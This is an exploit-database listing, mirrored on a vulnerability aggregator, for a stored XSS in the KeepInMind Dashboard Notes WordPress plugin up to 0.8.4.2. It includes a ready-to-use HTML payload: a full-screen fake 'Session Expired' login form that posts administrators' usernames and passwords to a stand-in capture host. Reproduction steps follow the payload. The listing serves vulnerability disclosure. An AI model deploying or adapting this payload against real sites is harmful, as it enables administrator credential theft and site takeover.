Lucene search
K

KeepInMind 0.8.4.2 - Stored XSS

🗓️ 06 Jul 2026 00:00:00Reported by Pavan NType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Stored XSS in KeepInMind dashboard notes plugin <=0.8.4.2 via REST API content parameter.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-9271
12 Jun 202607:31
circl
CVE
CVE-2026-9271
12 Jun 202606:00
cve
Cvelist
CVE-2026-9271 KeepInMind - Dashboard Notes < 0.8.4.2 - Contributor+ Stored XSS
12 Jun 202606:00
cvelist
EUVD
EUVD-2026-36388
12 Jun 202606:00
euvd
NVD
CVE-2026-9271
12 Jun 202607:16
nvd
Packet Storm
📄 WordPress KeepInMind Dashboard 0.8.4.2 Cross Site Scripting
7 Jul 202600:00
packetstorm
Positive Technologies
PT-2026-48833
12 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-9271 KeepInMind - Dashboard Notes < 0.8.4.2 - Contributor+ Stored XSS
12 Jun 202606:00
vulnrichment
# Exploit Title: KeepInMind 0.8.4.2 -  Stored XSS
# Date: 2026-06-12
# Exploit Author: Pavan N
# Vendor Homepage: https://wordpress.org/plugins/keepinmind-dashboard-notes/
# Software Link: https://downloads.wordpress.org/plugin/keepinmind-dashboard-notes.0.8.4.3.zip
# Version: <= 0.8.4.2
# Tested on: WordPress 6.x / Linux
# CVE: CVE-2026-9271
# CVSS Score: 9.0 (Critical)

1. Technical Description:
The KeepInMind - Dashboard Notes plugin (version 0.8.4.2 and below) fails to properly restrict dangerous CSS properties within the 'wp_kses' sanitization filter when processing the 'content' parameter via its REST API endpoint. Authenticated attackers with Contributor+ privileges can inject custom HTML/CSS utilizing 'position: fixed', 'z-index', and viewport units (vw/vh). When an Administrator views the dashboard, the payload renders globally over the viewport, redressing the UI to spoof a high-fidelity "Session Expired" re-authentication prompt, enabling administrative account takeover.

2. Proof of Concept / Payload Template:
An attacker sends a POST request to the plugin's note-saving REST endpoint with the following HTML payload structure:

<div style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 999999; background: #f0f0f1;">
    <form action="http://example.com/capture.php" method="POST">
        <h3>Session Expired. Please log in again.</h3>
        <input type="text" name="log" placeholder="Username">
        <input type="password" name="pwd" placeholder="Password">
        <input type="submit" value="Log In">
    </form>
</div>

3. Steps to Reproduce:
a. Log in as a Contributor user.
b. Issue a request to update/create a dashboard note containing the layout-redressing payload.
c. Log in as an Administrator and navigate to the main dashboard page.
d. Observe the entire administrative interface obscured by the injected container.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.9
EPSS0.0014
SSVC
31